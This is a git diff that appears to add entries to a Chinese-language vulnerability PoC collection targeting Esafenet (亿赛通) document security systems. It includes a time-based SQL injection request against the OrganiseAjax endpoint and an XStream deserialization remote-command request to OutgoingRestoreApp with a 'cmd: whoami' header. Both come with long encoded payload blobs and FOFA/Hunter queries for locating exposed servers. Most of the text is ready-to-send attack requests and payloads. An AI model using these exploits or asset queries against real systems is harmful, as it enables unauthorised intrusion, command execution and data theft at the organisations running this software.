JJIPABBGPICCMPNFPHHFHKDAHJKBMAHDBKLAJKPJFHOICCDFKJEDGGFDKPGJLKFJJJKCOANLNPDEJLHBBHJJGMNJPHFCHGINMJIMBDCBCDOHKDANDLFDOOCEADNHODFKGLBGAPAAONECAEACNDKGFGIMDAAKMLJJLAGKCJDECINGDJAHONECBMFDKMCKHOKADAPGBOKOGPEDFMHKFBDEBOMKNMELIALJHOHGOCAMKJCFECMNCODNHGIFBFIIJMPEHGNBDNGHICBLIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKPBFOBDLLOIBAHALODFMHODOHOPGPMGLIPIJONOFCGMELPFMKMMCPFFNMILJFONAACCBCIJFCAFHOHLBALEIGHDPMMFMFIHKJBAGGGBDEDNCDHEJALEBDPIIEGCKGKMPLGKJGEJAJPMIFCDBAELNMDPNKFCAEGJCAFJPJBBMPLMEIGCNPOLIG
HCLGMEJLKCHEPGBJCCDECFMKIBLFIGOFEJKPGAHIGOHNOKMLOHLKDIPAPMFOPBHDBMAAEBEOKBEMEHIILJENNPKHJIMJMNLGHMAENHOHGMEFLKPJJBHDGLGAAMIGDMDCHBMICMDKNGPCOPEKDEMFLKINAMOKNDLDBABNGLFPJHFMKMBBCAEJDENPHGJGGPLMIIHHIAHGIBOINFBNCKJLJIGEPNAOGJFAFPDDBHEBCKNNJKJDLBPHHDNNCEDGAKHGOKPMCLOOPIHHNFMNFOILEAOIFGOJGPDCBLNGLEIOHHHAJPFPGLJNFFHKCNMFGHAHANBJLHJFNNLIBEIFKHJHMENIIOONPDMFOCPKEDHHMEPHAJKGALDFDBOFKBOCDDAFLJBDIENKOHGJPHGLOPDMIEPDBHBBEILLFPOAKJKJAPFKAOMLFOJBLAAEAIFLBOMGECGDBILGNGBEHDEOFLOLHJKAOJMJKNNLKNDHAPCKCHLAFHMCCLNNIIGJLDLCCOALPEPPNEBDNPGEMMPFFALFDONIGHJEMJGJGPLKDKMBGCLJEPLHDBOIKMNGELEKLJLFFAEEEDMBJFLJGGHMPHADEJEJLKJCMLNFIELFBOKAOPCIMCEBFNGMECGFAMMNOMCHKEIJGGNIHKPBFJLKODLLABGBJANDJFBJNBDHIDNGJGLAOFHGFBMJAFJNNLKNBAALOGIIHFMIOLDOEEFNNJDFLIMNBAHJGPJBDHIKGHCDMMLKFOHOJFLOLHHCEJACKLGHIBJHJHGMECCLNHBDGHFNPNOFEJKKOMEFONNBANBKOLDEMFCMDLNLGDBFEOIKAFJDAHAEJHMIJGJFAOJIHAIBHOOEMHHCOODAIEOEBFLMNAMDIIDLDHAIJDBKCMGKJFHHFKKGABCJCPHBBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIINLEMPICLDNGAEELNGONJIKOPFIJBJIPDGPLEDMHNJJHLBJDDGNDIHECEJNEFNLEHNHFCFOEEEGFIOKCPENDLNJJHGFJGAMNFLNFFIMPGKEMKKAMEPBAHBKBHGGIEANHFOKPEDDNLADKABNLJPONGDIGMCLENLOBAKMEPODENJNNDPEOCCLMLOJDJPPPMEFLBFLAIDHNCCHDDONIDPMKIOAGODDPKHDBGFCIGOAFLPBMELEPDHECABPOFMOKJECEHKIJIKHLCEFMAIGEKAALLCMMCDLPHELOCEDNIAIIHJCGFHJFBBKFKCFOBAABJEIMEIMDPEPCHKEBCEMIPECMAJGCEKHGOKOGFNHHFMKOICKKBKKKBDGDPCGLGMGALDDMEEFILPFOCFHFGIPOHKADHACFDJCGCKPANCHDAEDMNIEACGEECCNIBJGGIENIOENAFDBNMJCPJDDDKGDLKMCILLIEKBEDADHHCMONHBAABOGHMPNGHHEHIHCBBJJINCFFJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIMBDPENPCFFFPDGMKEBPFOOFFBHCKPAGHGJJELHDFJBCKLMAJDCJIIILHKBHJJMKOAOMLFOJBLAAEAIFLBOMGECGDBILGNGBELIMDAFIFCBLHDHLCJLMAHCOKGMKDCLKKOGKKNDDAHMGGIAKGHAHPNADHLLPPFDJILKFMIHHPIMLOGMDHPFJHPMGEBKHGHLFDKPIKNDKFLBNHOODBEAHNBBDBALEJGOLJHFPKEIHMLKAJHBNICKMPHFANCLPNFFLDDHEKKOLODMEJOIJGPDOPCGDPKLNDLPBHFGIMJCPMLPCPNPCJCKNJBCJOJIJCHDGIDIIJGKMKAICADENFOEEGHJNEHADCHNEMABINOIIGAGNGNPNCPALKIADLLJBEMOKJEGPNELELFGCIFOMAFBPCAKEDHIGLMFPFIHGLFPIHFAOFBEIIDHKDCGIGPNOICHCLEAKLHILHDCONAKMNHALCLFLNOBIMBCMKNGHPIHGDEIGGILLNIHDPACAJGHBEBEBMIDAO
CAAKGMNBCBENBLGLLLOKMDMJANECALMLPLJNKGJKBLCIPBJBPMJOHNPOBPOBCGEMKBPJABNDBKCGAFALLDPJHHGMOGDJDNEKGJBMEIBPIJIOLDOPCEDKDPACBAAMDFLLJMFEGLKICDEMPCHMHIDFKFKDCMGGALJOLJEMCGHMKIMJPOEFPGECHMGBLGGGBJEHBDGGAJEALPEDHDGJPPFLLAHGGKAPCNJCIFBLMGGCKOJLHCHOIMMGEADLOPOPLIHPEPBAHNKNAKOFIMOBBJIBBHMFDNDAIIFMLPLABGGJEDHELLDPGHIGOECAEMDJBGHODPCNEDENIFPEHAMJDPDEMNJOACCBGPPEILNOKDFHCNGKANGBCDCDNGEIBMJODCBPJNGKLECPCHDHJEEDHNFJEKGLMAFKCMKAMJPDMJLBGLPEJLLHINCGOCOENMLDKLDLHIDAHBBINIEFLIFGBJGMGMDOJDLFNMAJDPIFGICFKKIECPIPHHBMAJJGNBPCKCOIMIOODGNDMKKMLKFIDHKBFGDHLGANLCJCDEMNPGCGPIPNEMIKDJJNKECHEJMCNAGDJNGIFFDPFGMAKLPLPLMOEDIEIOIIKMFLNDFDHCJHENMMAAJOFJLGDIAHBOCLMAGLPKKJAJGFPDCBJPGNAAMNGNNFDHDPIEHFFEPPJOMADEBHBIGFNOKHDKDNAIAAKLIGFNIFDKFMLJANODMADILHHONCGNLNJEKKAJHPMIDGHNJJOAGGFNKCOCONGBKNDNIJOLBGLGPLAKGCDIKIBNPMOACDBJLDLCNDCKFOJKINIIPBNBDHMNDEILFFCBIEMNMHCACEDFAHNMJLDEFGMJIINCJDNOHLDJIDOKKPCCENOHBDNMCGEHGENDBBBHFOFIAFGGCNKOKLMMCOOHNJEAJKILLKFJCEKEEDJHBGIMKLOEANBKMBFLDAGGOAIHNLDOPBPCHGNIDHGKFAMFGKBIIENFMJLHCGEMBKNJPMKDFCJCHFOLNOIPADHBEPLLHMNGEBMBHNLBHPIGHGPGKCPFOEGAHJKPIPGGMPIGNBDDIHKCLOFKIBBBHNPBNCLFGCHPOMIENELILEJPLKAHBJEPICAGJMNOAAOJLMPDBOOMEOFFAMKILAJANPCKENJMKLFKMBGOKBNKFGEGAEPEANNCIEENEBEBECBGLOKHEJCFCKABBAAMCDKCIMJLILOAEKHNKPCGOLDBBFFIGDHPDHOFNMLANMCHBIEHHIBHOPPLOFEGOAJLHCHPHGKLOCGJKKABNHLEHGKOINGEDMGDMCKKKLABBIOJCGANBDOCCELJCENBMIMBKCNJAEMBHLOJOGFLKJCNMEPJPKGKPHDGHIDCKAODGNNNCDKEDHLCIANLKENHMMDELDNBPNNNPHLGDDOLGDFPHOHFPBKMFEGOLFMMAFCNCDLMEKPKCDJNHIOJOOJADDHHHPPLGLMINICBIOEIALHBBCEGACCNDNOAPGNAGELEPGCBGLAEOPFGGIJBAKDFCPCCGJAHBDAJEPBCFMNJIKADAACMEFNBCBKICAALEICBCKEKHPCPDAKMDPGNCBBNKDFICFKKJEGOEJELPGLECFINPMBCCDLIGEJJALHPNHDAMIFEGJOCFGFDGBNJKHKAMOKOKKLIFIBAFAELPAPCHFFEOEBNFMLGPPMCDHDIIABOBFDCPFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBDLODOABMLPLAMCJIFGJNHALNOJMBLCFJFCDNCHLBGHLCAOICIJGDLGDMEKPHHMBOHAJJGMAIGLPIEIHHLKDOMBJMOPJIKBAKDHBBJLJJNPOHIDBAFAGMBLLPIEHENEMHNIFAGMMELMAJHCLFCDNFKHGEJFGGEIBKPFAFHFOFHGMCLLGCAJDGGJNKFBGDAAEAJNGEOJBBIFLLKNJIOJNHCFKPAPHGABENLMABGDMFOEEKIMHOBPCLPEAGNBFHEOMLGDDLDCODAJIEIPJNHJFD
PHILIKHMHJHBJBLPNPPPJOJJBDJHCPOCLBIBBPJLLMNKIOKPHOFJKEJAMOBGCHOONMPJNEGDMNFPKMNOIOMJPEPDNKBODKFCDGJMGBCNHIGHFODOJAHDAFEDKOGGLMEJCOACLPIMCMPLDKDAPFJGGECGPNCEDGAEMJADOCGBEFIIPBMJMMMPNHNAKJOBMOIMMOMEBOBHPPIPAHJHKMJADIIDCIGOMDJBJHMHCGFJLELPFOMAFEAPHLHCCKKNNJMMLKIJEBGEBEDOOLIFHLKHCOONJMHCAFGOKNOAAKONAAPPMONFOJENLNEPGBJKLEHIGBDOAIDKAILCHIFPPGGFLGCPINADFPDCGMIHHIPHBCPIPHKGMGBPEICLDADONHGOFMMAMLAAHHMBIGNNOENIOJLMNGNMMKCNGEKEHLJHHCDFJKMDOGMOLHIEHDOCNBPILJOFBNCDONBOIHDDLALGCLOBNAFBDHNPEJJODIENCOCKHGOHOOLHFNDOFAEPCHOJNFJJNHKAIBGJEGDBHDFJGHGEPIAGPJBCCCAKMHIFDDNEDMCAOBCCGOHCMMADMKHCKIACBMGFKOGDNFGIGBJFFFKJFNIJAPHIMHKOLLIECAJFNFLJLLHEBIBLIOBOEIMNJMIJOCHEBEKPDJOCCMGGEOKGOMOFPKAICOHBGBOEFIIIAJKPEIIGBGLJCCAHJNKJFILFICJCPAICDGOBJIHMEOJHLCNJBDIEHHNDGKMKLLDLMAJLOHECBFJEOHKCABKIHGEBNMAGAODODMAOMOBILIIGCDKPJOKLAFLJLENBFFNNAKANMKNKNBNOJBKEKODPBIDDCELHBDDHCKEELKFLEHCNEFIAOJJHHHKIAGDJJGNKODKIGJAGBFEBMDEOMCHILDNFEEPFOGPPAHEHACDCHDOIDELKKBLAOJACMGMIDOJIJLPAOCLLIIFPLJDKCOEIOPBEAHBLGNHJHPLNMFFMKEHLOPIGNFNJNGIEPNELLHMIIGNPODEDCIHCIJBNMENKGFNOMILCBMELHLHNOBFLJHDIFLHPCKEAGJJNEAOBPNGKECFLDPPMCCLMNMHFICELDKEFNPMJHNGOKLOBHONELNCPLNDFKOIJONIBBBGABIANBIHHJDDLACPJEENOHCCDIJAPBKNNOECPIGOIMNMMPOGNCEOGDKNCCBHEEJCLEFMBEMEJICLGNHNIPEIOIAPKJDGOIKGEBGODFIGCHKCFFLPGFJBKDJOIMEJEHEEAOOJGLGKKDHGCIGFFOPILPFENMOKOMJLODFBNKOFEJKICAMBGPCPDNJOJDALNGCOFDAINHOAMCNLIIJEJENKBHFDAOFAAPJKBONHBMGGKAEMGHNJPCJFBDCKICEIELCGDJKIDFAKAFEHEBOMOBOGFDNEAANCAINACLGFMMFOMGCCBNLDCCPGLKNCABNEDFIGKDJHAEJIOOACADPENHDNOOKPILJCLNGMIIOPICHFPACILNJNAIEILINONKDMONACMLIKHOMPLHAODMDPFDNNKDMPMFEIMBOIMLOLCBBGOKONLDJCDDHGHIIIHDOLIJMGPFKMMPBDDPBIKJIBPKDNHOAHEFENPMKBLHOCDKLCKIMAOFHOEDNHKFNKKGHCICLAFKOBANHOIHACPLPLBCEJFONFMMGKINEPMEAANNFKCFODBDNAOIDMEFBLPBAIABHFJBNGMIKCJFGLPEHNDJHMGKFPPGEAFHEBFACNBIGGEIKCPBGIKHHNEAEMOAKKEMFKHDEBEGDDGJJLCIIICMNIDNMBIKHIDLJNCOHFENHIFNKJEECDNLHMPGPGMJMGJIJHDBFECNLMLFCLDFOMCFNBJELHJFFLDKGNOIHKEIFCBPOPCBGIJENFHKCNKOJMFBFIPFGBLFJCFPFNOCKGAADPFFEJFDNKGFMEILHBFMAFBMBOFNDGOMCGNIGJGOBPEOBPEKGPMMEMHLHMMCNDCDFPMACNDELNHGCALNPHHNFFL
NAKEEEELCDLHDHBFOJBJFHBOJNBGEOLIACBICKNMEEGPBEKIBEEMKGKLDAKAALKOBBJIGECCKHILNGKJLKGJBOPOFHCNHBKFPHLLLLMNNKPJADFGMCMPLILPCLOLJPOCIOOPOAPPMPFOEPNFGEEDALHLEIHJFAIHCFKLJKCBAABOIBBEAGAAPJJIHIHIACHLKBCPMEHCDGDPKPMALDBADOEKFMDFGAPPGNNJDAMPMNBAEHLLGIGCOLKJPGANBJODFEMFHHDAIMFNNIAEAKLKBBEEADPHIDIINDABGNKNOODAGKLPGAIOIFJLONMCNGOMOEALKIIJFLAHEDDNHDENODGINCAGDBFAAECFCNPBBOBBIALOHDOIOMMMJCAHMEFMAGNLALDIPAJPHLOKCHJGGLGEHFJKMDEAHEGABCCMCFOBFCMGGKGBCCBPJIJJNHNAPPECAPJEHMDMOLFIEOIFOFFGKCFCNFAKAPGBMEBJGIDLDBNHOLJGLOKOOKCNHGLNEGNBKHFDOJINFAPPKMMOJCOCENEHPCGDNKKOJFPBNFHIDDHFPHMCOAOKMOPHJNOJCFOJJGOOLNCKAHBFDPIDMJGKBHHEAIOKPJEAJJCNJFMMCKHJANGDEIHKHBAAFJCJGGECNBIBNLBLFMBGDJGHJDPMBIMPJLLBNNANCJJHBJBLEPGNIJOLGJLCGEJKNGBLDLGKMIOANJGGDPHHCGHLENGJHBANCELNLNNBADCDDCDOENGLFGIEBCMHPFBLOIDMDNBCAMFMCMMKCDKPOFBJFBGCMPOFAPCILIPFJDEDDAGKFMHBBEHIHOAGDKPONBOADJEIKKBPNBAPDNOEEEFONAMIFBLIHLLKOLEFHKPPKONJOCFHFOAPIJGMHKPHGIMBGOBOAOCGLMGDLIOPIJKFJIPCHAJEGJFCPOBLAEDFFGIMKEIPDBKNCKIHFHCIHDFACJMOGHMONMPPDKODNGCOBFMKBBMIEFGHOKOMDADNGANEMKDFLNMCABMOONIFKFEGDLJFAHLOODEBNBKFGPLANHIJFFDLBFJDCJHMPCPHBDPFICAJHCBBKLNLGEPHMCGKEKOLJBIIAMLMCFBIGACEHBBLHAIBBODKEDBPKPADPBJIKCGFCKDHPKCGELAMHIFEBBICMAGHPDCIIAJMBKCFMHJDHIPNNHFJILAIBPKKGLOEONLBLJGCIMHKAJCAHCNNDBDEJNDGFNMEJJECPFIONGEMLMOPEDNJDFBAHAEBOKMCNEMBEOMFIFCKLEKNLJOAINFFJLKPGPLHJMAOMLFLGDPBCIIPPPOHNMKOKPGEMFEOLDEHEJMPIOIAODDNJOFGLHNDAJICAOFOJKDDFBMMJJEIAPPNDBAKMJIIGNHJOPHKPINANLLLBBIGNIKKHDLKLJGOPKHGHICEACMCJNMMDJGBNACEOFNBDNKAKIOMHPECJEELPLNGPGMPHCOJGOFBENNNKIEKOJHKDAFGBAKHGILNJMMOKHDMIDIOGGKPFIFJOLIDDEGFCLKGNICGHJOINJCBOPOBKNAIDEEAGGLCMCEGPGEDPNFIKEADDPPINJIOMFKGCMJHDHLGMODMMGCNEIGNGGEMLLABHCCHGGDPGHJFBJMCCFGJCLCFCDJEBFMDMIEDBFJPKLONGIHJABFOGBAALJKCADCBOMDFAHLBPIJEFGLGOGPEAFAKFJCALDHMICDCIHPICLPEANCLCBKOIAMEHHLFIJHPEACFCPDDKCJHMNDBHEHLHBHHPEEACDMICBKGDHODHPCMLAMHOEJKAOODJCIPGMOCGPOAFJDDLGCENAKAFDBDEOKAGLBHJHEJEHCCJEFMIFNJDPDFNFFPAOLIHNFLJDDECGLCJNEEACCJDHPKOIJMOJOPDOKIGOPKMOHHPNOLCDHMOOFDKKBCBEPJPFJBDOEJBCODALFBPMGFPHEMFIBCBEMCANBOMOAKAIGFHJAKKGGAMDPDFMHEEDFHOHKABHBEJFEG
AEIPMBPBIHIABBILCOGDCPKHJIPBLCLJEENPKOJLHMALCEKELIPFFLJNNBINAPPOFHPEJDNNILKCEECPJIGJMKEJCNPEKJMDKPLLEHDDIGKKEDEPFHIJKKPNBBAJAMKNMNHIJFHBCKPKAKMAKCHMJJPFMFCFBKJMMEBABPCGCOCNKBJJPLMPHPJFLJLDABHNFFBOIGNCOFHBMFKCKMMENEJCPDOBPMAIDHBNKIAIGKAAHDCAIBLBKPNNLBNMEDCCOBGMDMAHJPPENANOCILDNELHNCIEAOMGKLMCLLEDDPNLDJNBFPEJOKCNNCJHKAPOCGFGENACAGBNBDEIAMGCCGKDNOLNKOCNMMABOMGGKGOFFOLKALPKFNMJJMEMMBBIAAFAAFPIBBDLOENGFIJJAFHNKKIDCGJNIGAFPCPDHPJAKCEKCCKDAIEDJCIJGMJJLEOEDELMJJMEJCCNEIMPDKIALLHFJNNGHOMIJIDPOCLOMECDFMEPAGLKNKEAPKHCBCFDINJHAGJAGPCGEJJEFAABLOEHMDIIGNKKDIILLFGPMBOIKEAAAJGPJHFGAFFPFEPKIKLKBMKLODNLBMFIEFPGAGFPCDCPJACDAEHCFOGEJHHLLBLBBDDOEEJJBPPHDCCOGPOPFOPCFJKBGCNCLLHNAJKIKLHKKIJLAIKBHCMBODNCPCLNHDLMHDPNKGIBANJJHCFLIMKPFOAIEDBDMIBEEPIHODEOLGAJHBNEOGCKIBMGIMJKLAOFAIACFJGOFEIBIOOPDCDCNFIOGCDKEGHEIAOBDCKLLGMEOEKIEHCEBFKAGOLFGCMNLNMJCNJMDBHMDPEGHHFKOJDDAPPHJMBLBDODOHKPNABBMBHMCCMKINKJLCIFBIPCENLPLOFOAJPEFHCDEOGLGFHNOBFFLHDMHNEFAIPMBJJMIIDAEAJAKGDIHIOIPIOPBJKOLEHJLBIOLGLBMHNCNDAHOGDOILIJANBPNLPPKCOKJFJPCLFJPGKDCBMGEOGGGANMMKDILOMJJLPKJJCOPFKPFAHNAIMDOKPCIKNEMFGMGCOGGMKBIBDEKDAKBPBJKPAFGODBFLGADBFNMDAHGLDGNFLLBONBDLAAOIIICMHIPDJCMHBGLFJAIMIBHABENMJOEHJLKGIIJDBBEHFJCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMGOPFDMJHCMOGLKPICOEEDDKPAHLEGOMDMDFLKFECCPILAKGLGDEMGMGEPODAGGJPPNDCHOBPHJKBDAKECOBIOJGKDMBKDBFPEGIGNOBDGELAENFFLCBKHHJADGFGCBAINLJPDMOBGLNNHAOBHGLGMMLDHGINFFOLLALGGAADPGMNJDMNOLKINDIKKIHJKDEKFAJDHPHNGAIBGNAODMICFEFCCHDPGMLJOGIJCIOOMMGEKPILGPFJOCMKILLFGPEAIBIDBGNPPDHLLAHMKLEJBJFBFPFBDNEJCNPK +``` + +![1706605271369-7f37d9cd-4ab8-494c-b4fc-471d36be127c.png](./img/RHal_2krZDLiIbZ5/1706605271369-7f37d9cd-4ab8-494c-b4fc-471d36be127c-882324.png) + + + +> 更新: 2024-04-20 22:01:33 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ng30d3l71npc5y8s> \ No newline at end of file diff --git a/亿赛通电子文档安全管理系统OrganiseAjax存在SQL注入漏洞.md b/亿赛通电子文档安全管理系统OrganiseAjax存在SQL注入漏洞.md new file mode 100644 index 0000000..1c91136 --- /dev/null 
+++ b/亿赛通电子文档安全管理系统OrganiseAjax存在SQL注入漏洞.md @@ -0,0 +1,21 @@ +# 亿赛通电子文档安全管理系统OrganiseAjax存在SQL注入漏洞 + +亿某通电子文档安全管理系统` OrganiseAjax`接口的`groupNameSearch`参数处对传入的数据没有预编译和充足的校验,导致该接口存在SQL注入漏洞,恶意攻击者可能通过该漏洞获取服务器信息或者直接获取服务器权限 + +## fofa + +```yaml +app="亿赛通-DLP" +``` + +## poc + +```javascript +POST /CDGServer3/js/../OrganiseAjax HTTP/1.1 +Host: your-ip +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 +Content-Type: application/x-www-form-urlencoded + +command=search&groupNameSearch=-1'waitfor delay '0:0:5'-- +``` + diff --git a/亿赛通电子文档安全管理系统OutgoingRestoreApp存在xstream反序列化漏洞.md b/亿赛通电子文档安全管理系统OutgoingRestoreApp存在xstream反序列化漏洞.md new file mode 100644 index 0000000..042b237 --- /dev/null +++ b/亿赛通电子文档安全管理系统OutgoingRestoreApp存在xstream反序列化漏洞.md 
@@ -0,0 +1,36 @@ +# 亿赛通电子文档安全管理系统OutgoingRestoreApp存在xstream 反序列化漏洞 + +# 一、漏洞简介 + 亿赛通文档安全管理系统是国内最早基于文件过滤驱动技术的文档加解密产品,保护范围涵盖终端电脑(Windows、Mac、Linux系统平台)、智能终端(Android、IOS)及各类应用系统(OA、知识管理、文档管理、项目管理、PDM等)。亿赛通电子文档安全管理系统OutgoingRestoreApp存在xstream 反序列化漏洞 + +# 二、影响版本 ++ 亿赛通电子文档安全管理系统 + +# 三、资产测绘 ++ hunter`app.name="ESAFENET 亿赛通文档安全管理系统"` ++ 登录页面 + +![1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6.png](./img/mNluLungjp6mX99D/1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6-038082.png) + +# 四、漏洞复现 +```plain +POST /CDGServer3/OutgoingRestoreApp HTTP/1.1 +Accept: */* +User-Agent: Mozilla/5.0 +Connection: close +Accept-Encoding: gzip, deflate, br +Accept-Language: zh-CN,zh;q=0.8 +Content-Type: text/xml +Host: 192.168.31.208:8090 +cmd: whoami +Content-Length: 14756 + +NNLINELBIIKEOGPIFLNMHIPNNOHFNECLEHKBCIHIFHCMONPDPHOHMONIOCNLPBOKNAEEBHFCIFNMDPDAACABKCKIAEMBPOIBGPMNEIPJAOGBILDKMLDGAENLPAFBKFPFELKLGCEBMBMNKOIBMPHCIODCCEHOKPCEDHPNLONIODEGNCPIGDFMGMDPOMMEDIJNFKDCHHBFMFGBDOIOAHLOHNAMDBJABECIJOEHKAPJCBDIDJHKAMAGEELEHJEEIDBDILILANAKCIIGLMDIDDMOPNCNGLPPOMMIGCEFEBIMDHFAGLHIDHPJCHAEHFPHNHJGJKJDCINLAHOAPCDJNIABODKBFABJMFIEMLLPGGKNNNFCAOBHCOEOHCBFOFGBBPLKPHLLNOCJAKJDJPOEPBEKKPHOPBHFLJLNOGLABIJHIBOFFCPCLPAGLCEAONCAGIJFAEFOLKOLENHNFBOJIAOFJKBFMGNKBEECKKJPCECMFKPPPKEGOIOBHIBIBAGBIKAMOFLEKDKODMHGJOCEPEBNIHPFKEKKMCENNPHEODFNIOPMHFPPNFFIJEEJPPIMGPKHDOACKEEJACLCOKIPFHHECFDFJNMIFNGHLCOFLPDACOOALCNKBOEBPNPCKCKNJJJJANLFPKGLOINAIODAJNHAEDLBNONDJHPFELIJMNLMHEMBFGOHELCDBFHIFALDIIMBFEOHNHBOIOMLCJKCPHJPNDLPHDDCFJNMGKDMEINHIDLEGMOCNAFDAHOMPPIFFBPFCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMBJDGIDJMMGEOEGJNJDNNEKFDMEAHMILDKIFBGKGEJCMGOFEKGJEMNAFLDGEEOBKOHADBAMHBMDJOGIFPMDKIILIGAEELNEOAKNEFHDOGHOPBDICEALJIENFKHFCEHMPBJLCFPDHDGBBFIMKHLLFIHONFDJAIEJJLPPFMAEHBHDEBOIDLCMCIKAFBEBFEBGJEECDEINCPNPKIENONIMPBJCCMCHOAJHHDKDKEGJGDGJDJIDEHNNLNNHEONJEJHNLHLPMBBEJDLLJLLNPKIMGHLOFMMKBDEBHNFLPGEOKMHOFNBLLAALGMKNJONNGIOJLBFECJNLKHMBCKELDPBDMBFEHAKBHEMNDFBBEDCAMMHNNGM
DGLNJHJDAGPILNGBEDCDJBCJOAMOBIFLOFCFIJKDELPPFLFBOHHNIBEGOOFEFGAENOKBMPCBDELFJPAHICDPGANJALHFENMFHAJLNECAEGOGCBOIDLJENHCEDMAOEEOFKLDEBJEJOBCFLPEIEAGPOILBEGOKPOAAPGMICFMFLJNDMBGAJJPKNLIBOAABJLNADADNALIKHDJMDKGOPELEHGPDGNJHAAJKICHBFGMHCLEPFHCCKNFKPEOMHPLMOHBGDHCOGEIGPMIGLAHKBCEDHFGLDIKIIIMEPHMIMCIGJJDCKIEODLKCKOLAKBFHIBHOPNAMPEIKHCMDPNMLACKHOGJAEMBJPFEBOCPBGGAFGGNCOBEAIPANPLIBGDCCNMDNDNOIPOECCPELCEDPGCNJHEIOIFPJDKIFNJGHAHLHFNPICIJLHELMODMJIEGMMBNMMFBEJCDDDFOPAJOMBNKBDBGKKMLKCBBPFOOJCKFFIMLCODLOFNOIEHENLJNOFDAMKFLHIADBNGANHIANHOCHLILNJLOCOHFHMNFHALJHOPGKLOPHLMELJFBIABENFKEHCLIKMFGHPPJFIBBANPIOFKEEBIFIBDIIAIKENFILIDPDELJDMOPFKBOHPGLIPMNCFJFDCJGKCFOAJMPIIBEOHJPPNHLOCINIECHMJJMCKHICOMIMLHJAOJIGIFLMINANOFADOGDLLHCEKPECHDFBGIPEPNJBJOGLHDLKFLBFPLPFAENMMIFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBNEAKOAMMEHPGCBAJCHDBGJANBBHGIBMPHAMCEHEFLBAGOKDPKIPPDFLJIADKKOJPEPIGAKPCGKBNFBPLLKLEGBPJJCDJFGHDMLPNJBGFMLGMCABONHBLHPKHKEGJIBPFKCLMBIKKOMINPAJEPFHANBIBKMPHKEODCBMMIGAEFCENBNKDONGNLBADGDLJBMJGKEMNJOMPHDOPALIGEPCEDDAHJMNMJBFLIPBODEDCDAPMNGCANOCPLLMJOCPMPJDMEAMEPELICJKJLODAJEILBOJNFAJOFNOGCHGOJEGMGCPNCDEECKPAIAOHCLJBBFDKKAIHOJEKDBOFMFOBEDLNGJNIAJPLGMHBLHODIKDLEPOINDPDDIGKOLGEOBFFPMOHLBEALFIGAKNDKEKEJMJLNGHNANLCGLPNLBBFNKNEKCGBJKJDABFNAGPDILHBAAIECKBLKEDIJIMPJOMFLHBMOBLEKNEHINHAKBOHICLGBBPIEJIKALMIJHKHFIDNICAEEFPGGPBCBFPOJDFFKAGKAEOOCPMGCCMHPCIKHCODDCNGDDNDLAIMAPEMPNECNFPIALJELGOIHECEKHBHOHNIFCBJBFAOKKDCMNHHINAFGNECFPOGHBNMPJOECCFOCHICANBDOCCELJCENBMIMBKCNJAEMBHLOJOGALHGLLOEBFGFJAOFJHEGNLCEBCHGLNFEEIDOKIJNDHDANFPGLEMHOIJHOOJGKLGHBFBMBPBKEFOAKAIAGDMBLDEKLFKADKHNPAKBNPDKFIOAMAKKEHFNDABEPGKBMFCDFFOCIPDDEBOBFONDJFAJIJBAMGNBMCMJODGEGKIMIOLLAKMKJJAOCEMOBDCODALCKGKKKIADHOFMLNDGJBEMLLJPJOKPAIDACMPCOKAGKLIIMDENPNMEIBBMIFHGJKLKGPNOBJGMMLDKFKALLFHFDGDBDBMPOPDBLDNMAALEMAHGINFECKFHKJHFOCDJNBEDNGJCNENGIDHBJOLHEPFLEPHOOGJKFEGFLEMLGKDOOKIMAJIBJKOLAKCHBJJFDIGEMPABDNJFGMDAGEDIOHJKOAEHPLIBOFLIMFIEFOOGDHDNLCKOKPEDKEEBPAHKFMKBNNBAMICPOPLNPIGLMPDLAFBIEPHPJBFLBDECCPFINEBGMPMECAICGFLMJEKEIKDOKJMOAJLFNHHEHEPDAMFLNPKCDPODP
LMFFAMILMAFIDBDJJOKIJKGJACMOMEHDDCJJAAOAFJDCCEFHKMJNDJEOLOOIHCFIILOIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKEDPBJAKIPHPKELOMHNFABNMIMODOGPBOFLLPBGAHCEOBBFJLKNAMKACHIOMMFLAPFJCHBIJAAEJELEFFEIMAMCACJBBGADJDJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIKNBGDCJJCPMABJINOGLAPAHGLJLADBJKFLNAAFKFOBIJKCFIDEKNFGFCHDPGLKFDKPPHPNCFIGAMHBNHMLJAHOKKFLNOCNDNPPJJHBBKHDIIENFAGAHOMFPNNBGDLDEHLBDOKEOAEFPPCIEPGIOAHDEEMIKDPHBMADGLNILDCIEKELEBBEOBKLCDLKLKLLKHDHBHGDDLHOHGPPANCDABBHHBDOOLEOAKBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIGOGDKMBIAMJNNOOFGCNHBCCCFKCAOFDDDCBPLMMHGBLEDOPNEHBOECJGFMFOEIEIFAHLCOOAOLBFFKHAHIEMAEOBBPMBJNDMJJDMNJEMBGMNEPCFODGCOCKJICOBEGAFJKFADJOFMGPILCDMBFLLLAHEKPBCDJEBMHDLBLDLLCIAGNJJBFHFOIPLNNOFAFNOMFPBPNFLPLFFNNBBNEPBHBKJEOHBJPMOHHEKFHGACPFPDAHPCAPPGPKBJBGGNIPLOHFPAPHLHCJJHNGNKOMDMIECKACEPHCFJJAIPLCEOFNLBAFGFLBLNBPAHBOOJOKHIBAJFEAEKBNHHODNJNMEONLHDIPPCJJAEKOOELNHPDPAEPPBILHLHELMDHGPJMILIEOFJHBIJHAIPPKCIJKKANAAKEDNDAILJPGJLIBJMABMPDMHGPNALCCAIIAMJMFGJDOIPEFEBMMOBABIKBMMHMFHLBEFFLAGJLNMDEAOALFJGOGNFMFEFKPMNCNNEFMJNADLNIILEGKLOOHMBHPJJCNFBPKIKMAIE